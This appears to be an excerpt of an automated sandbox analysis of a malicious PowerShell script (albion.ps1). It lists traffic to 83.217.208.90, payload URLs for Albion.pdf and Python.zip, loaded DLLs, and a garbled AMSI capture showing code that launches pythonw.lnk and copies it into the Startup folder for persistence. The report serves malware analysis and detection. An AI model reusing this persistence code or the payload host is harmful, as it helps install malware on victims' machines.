Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000003.00000002.2446495096.00000134F62EF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: CallSite.Target.pdb source: powershell.exe, 00000003.00000002.2446980057.00000134F65DB000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.IO.Compression.FileSystem.pdbh{/& source: powershell.exe, 00000003.00000002.2420450912.00000134DC368000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.IO.Compression.FileSystem.pdbs source: powershell.exe, 00000003.00000002.2446980057.00000134F650F000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.pdb- source: powershell.exe, 00000003.00000002.2446495096.00000134F62EF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.IO.Compression.FileSystem.pdb@ source: powershell.exe, 00000003.00000002.2446495096.00000134F62EF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.2420450912.00000134DC368000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.IO.Compression.FileSystem.pdbpdbtem.pdb source: powershell.exe, 00000003.00000002.2446980057.00000134F6586000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000003.00000002.2446980057.00000134F6586000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000003.00000002.2445941824.00000134F624C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000003.00000002.2446495096.00000134F62EF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000003.00000002.2446980057.00000134F6586000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000003.00000002.2446980057.00000134F65DB000.00000004.00000020.00020000.00000000.sdmp |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: unknown | TCP traffic detected without corresponding DNS query: 83.217.208.90 |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DE758000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://83.217.20 |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DEDB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2421862751.00000134DE868000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://83.217.208.90 |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DEDB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2421862751.00000134DEBA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://83.217.208.90( |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DE758000.00000004.00000800.00020000.00000000.sdmp, albion.ps1 | String found in binary or memory: http://83.217.208.90/documents/albion/files |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DE868000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://83.217.208.90/documents/albion/files/Albion.pdf |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DEDB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://83.217.208.90/documents/albion/files/Python.zip |
Source: powershell.exe, 00000003.00000002.2442676664.00000134EE42D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2442676664.00000134EE274000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DE421000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DE421000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DE201000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DE421000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DE421000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DE201000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DE421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2449417584.00000134F66A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp |
Source: powershell.exe, 00000003.00000002.2442676664.00000134EE274000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.2442676664.00000134EE274000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.2442676664.00000134EE274000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DE421000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.2421862751.00000134DEDB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2421862751.00000134DF65A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.2442676664.00000134EE274000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Windows\System32\notepad.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: mrmcorer.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: textshaping.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: efswrt.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: twinapi.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: oleacc.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: textinputframework.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: coreuicomponents.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: policymanager.dll | Jump to behavior |
Source: C:\Windows\System32\notepad.exe | Section loaded: msvcp110_win.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000003.00000002.2446495096.00000134F62EF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: CallSite.Target.pdb source: powershell.exe, 00000003.00000002.2446980057.00000134F65DB000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.IO.Compression.FileSystem.pdbh{/& source: powershell.exe, 00000003.00000002.2420450912.00000134DC368000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.IO.Compression.FileSystem.pdbs source: powershell.exe, 00000003.00000002.2446980057.00000134F650F000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.pdb- source: powershell.exe, 00000003.00000002.2446495096.00000134F62EF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.IO.Compression.FileSystem.pdb@ source: powershell.exe, 00000003.00000002.2446495096.00000134F62EF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.2420450912.00000134DC368000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.IO.Compression.FileSystem.pdbpdbtem.pdb source: powershell.exe, 00000003.00000002.2446980057.00000134F6586000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000003.00000002.2446980057.00000134F6586000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000003.00000002.2445941824.00000134F624C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000003.00000002.2446495096.00000134F62EF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000003.00000002.2446980057.00000134F6586000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000003.00000002.2446980057.00000134F65DB000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: .lnk Python$pythonwLnkPath = Join-Path -Path $pythonFolder -ChildPath "pythonw.lnk"while (-not (Test-Path $pythonwLnkPath)) { Start-Sleep -Seconds 30}# 6. ????? pythonw.lnk, ? if (Test-Path $pythonwLnkPath) { Start-Process $pythonwLnkPath # 7. ???? pythonw.lnk ?? ??????? $startupLnkPath = Join-Path -Path $startupFolder -ChildPath "pythonw.lnk" Copy-Item $pythonwLnkPath -Destination $startupLnkPath -Force Write-Host "???? pythonw.lnk ????? ??? ?? ???????!"} else { Write-Host " pythonw.lnk Python!"}@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-C |